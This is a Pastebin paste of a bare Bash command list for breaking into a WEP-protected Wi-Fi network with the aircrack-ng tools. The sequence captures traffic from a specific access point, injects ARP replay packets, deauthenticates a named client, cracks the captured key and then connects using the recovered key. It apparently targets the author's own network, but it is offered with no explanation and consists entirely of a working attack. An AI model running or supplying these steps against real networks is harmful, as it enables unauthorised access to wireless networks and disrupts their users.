Advertisement
Guest User

g0tmi1k WEP

a guest
Mar 17th, 2010
2,751
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.41 KB | None | 0 0
  1. airmon-ng stop mon0
  2. airmon-ng start wlan0
  3. airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0
  4.  
  5. aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0
  6.  
  7. aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0
  8.  
  9. aircrack-ng output*.cap
  10.  
  11. ifconfig wlan0 down
  12. iwconfig wlan0 essid g0tmi1k
  13. iwconfig wlan0 key 59EF19C76A
  14. ifconfig wlan0 up
  15. dhclient wlan0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement